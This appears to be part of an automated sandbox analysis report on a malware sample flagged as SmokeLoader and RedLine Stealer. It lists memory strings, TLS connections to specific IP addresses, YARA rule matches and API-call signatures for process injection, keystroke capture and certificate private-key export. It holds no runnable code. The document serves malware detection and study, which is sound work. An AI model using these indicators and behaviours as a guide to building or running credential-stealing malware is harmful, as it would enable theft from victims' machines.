Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA15Yat4.img
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA1hlXIY.img
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAKSoFp.img
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAXaopi.img
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ.img
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqlLky.img
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img
Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://outlook.com_
Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://powerpoint.office.comcember
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://simpleflying.com/how-do-you-become-an-air-traffic-controller/
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.moz
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org
Source: 451E.exe, 00000009.00000002.4176613175.000002E002DCC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: 451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
Source: 451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
Source: 451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000003.4155384339.000002E004C26000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
Source: 451E.exe, 00000009.00000003.4155384339.000002E004C02000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
Source: 451E.exe, 00000009.00000002.4177606675.000002E002E44000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17pot
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew
Source: explorer.exe, 00000001.00000000.1765842009.000000000C557000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://wns.windows.com/L
Source: explorer.exe, 00000001.00000000.1765842009.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://word.office.com
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: explorer.exe, 0000000B.00000003.2680145906.00000000009F3000.00000004.00000020.00020000.00000000.sdmp, A4FF.tmp.11.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F22000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp, 451E.exe, 00000009.00000002.4177703163.000002E002E77000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: 451E.exe, 00000009.00000002.4176613175.000002E002E1E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: 451E.exe, 00000009.00000003.4168022466.000002E004F29000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/lifestyle-buzz/biden-makes-decision-that-will-impact-more-than-1
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/13-states-that-don-t-tax-your-retirement-income/ar-A
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/no-wonder-the-american-public-is-confused-if-you-re-
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/exclusive-john-kelly-goes-on-the-record-to-confirm-several-d
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/topic/breast%20cancer%20awareness%20month?ocid=winp1headerevent
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/metro-officials-still-investigating-friday-s-railcar-derailment/ar
Source: explorer.exe, 00000001.00000000.1762089358.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/rest-of-hurricane-season-in-uncharted-waters-because-of
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/list/polite-habits-campers-dislike/
Source: explorer.exe, 00000001.00000000.1762089358.0000000007900000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe

Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49799 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49768 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49769 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49770 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49771 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49773 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49774 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49775 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49776 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49778 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49779 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49780 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49781 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49782 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49783 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49784 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49785 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49791 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49793 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49795 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49797 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.4:49799 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 00000011.00000002.4175265628.0000000000F61000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.4175451887.00000000034A1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 2176, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 5368, type: MEMORYSTR
Source: Yara match	File source: 6.2.C35.exe.6b0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.3.C35.exe.6c0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.C35.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.670e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.vejhhuh.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.vejhhuh.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000003.2264399369.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2510328595.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 19_2_0055162B GetKeyboardState,ToUnicode,

19_2_0055162B

Source: C:\Users\user\AppData\Local\Temp\451E.exe

Code function: 9_2_00007FF763AF3220 CertGetCertificateContextProperty,CryptAcquireCertificatePrivateKey,CryptGetUserKey,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,CryptExportKey,VirtualProtect,VirtualProtect,CryptAcquireContextA,CryptImportKey,OpenSCManagerA,OpenServiceA,QueryServiceStatusEx,OpenProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory,NCryptExportKey,CertOpenStore,CertAddCertificateLinkToStore,CertSetCertificateContextProperty,PFXExportCertStoreEx,PFXExportCertStoreEx,

9_2_00007FF763AF3220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.2024427682.0000000002091000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2024380318.0000000002070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2561500633.0000000000670000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2315796782.00000000008AE000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1780503587.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000005.00000002.2024314586.00000000006ED000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.1780720142.000000000090E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2315604310.00000000006E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1780526952.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1780608383.0000000000801000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000005.00000002.2024197978.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2561731311.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2561826979.00000000006F1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2562004757.000000000075D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000006.00000002.2315529494.00000000006B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000006.00000002.2315554860.00000000006C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00403247 NtTerminateProcess,GetModuleHandleA,	0_2_00403247
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_0040324F NtTerminateProcess,GetModuleHandleA,	0_2_0040324F
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00403256 NtTerminateProcess,GetModuleHandleA,	0_2_00403256
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_0040326C NtTerminateProcess,GetModuleHandleA,	0_2_0040326C
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00403277 NtTerminateProcess,GetModuleHandleA,	0_2_00403277
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_004032C7 CreateFileW,GetForegroundWindow,NtEnumerateKey,wcsstr,	0_2_004032C7
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\v173TV3V11.exe	Code function: 0_2_00403290 NtTerminateProcess,GetModuleHandleA,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00401514 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401514
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	5_2_00402F97
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401542
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00403247 NtTerminateProcess,GetModuleHandleA,	5_2_00403247
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401549
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_0040324F NtTerminateProcess,GetModuleHandleA,	5_2_0040324F
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00403256 NtTerminateProcess,GetModuleHandleA,	5_2_00403256
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_00401557
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_0040326C NtTerminateProcess,GetModuleHandleA,	5_2_0040326C
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00403277 NtTerminateProcess,GetModuleHandleA,	5_2_00403277
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_004032C7 CreateFileW,GetForegroundWindow,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,wcsstr,tolower,towlower,	5_2_004032C7
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	5_2_004014FE
Source: C:\Users\user\AppData\Roaming\bsjhhuh	Code function: 5_2_00403290 NtTerminateProcess,GetModuleHandleA,	5_2_00403290
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_00403043 RtlCreateUserThread,NtTerminateProcess,	6_2_00403043
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_00401508 NtAllocateVirtualMemory,	6_2_00401508
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014CF NtAllocateVirtualMemory,	6_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014DE NtAllocateVirtualMemory,	6_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	6_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014F5 NtAllocateVirtualMemory,	6_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014F8 NtAllocateVirtualMemory,	6_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\C35.exe	Code function: 6_2_004014FB NtAllocateVirtualMemory,	6_2_004014FB
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,	8_2_00403043
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014C4
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_00401508 NtAllocateVirtualMemory,	8_2_00401508
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014CF NtAllocateVirtualMemory,	8_2_004014CF
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015D5
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004014DE NtAllocateVirtualMemory,	8_2_004014DE
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015DF
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015E6
Source: C:\Users\user\AppData\Roaming\vejhhuh	Code function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015F2
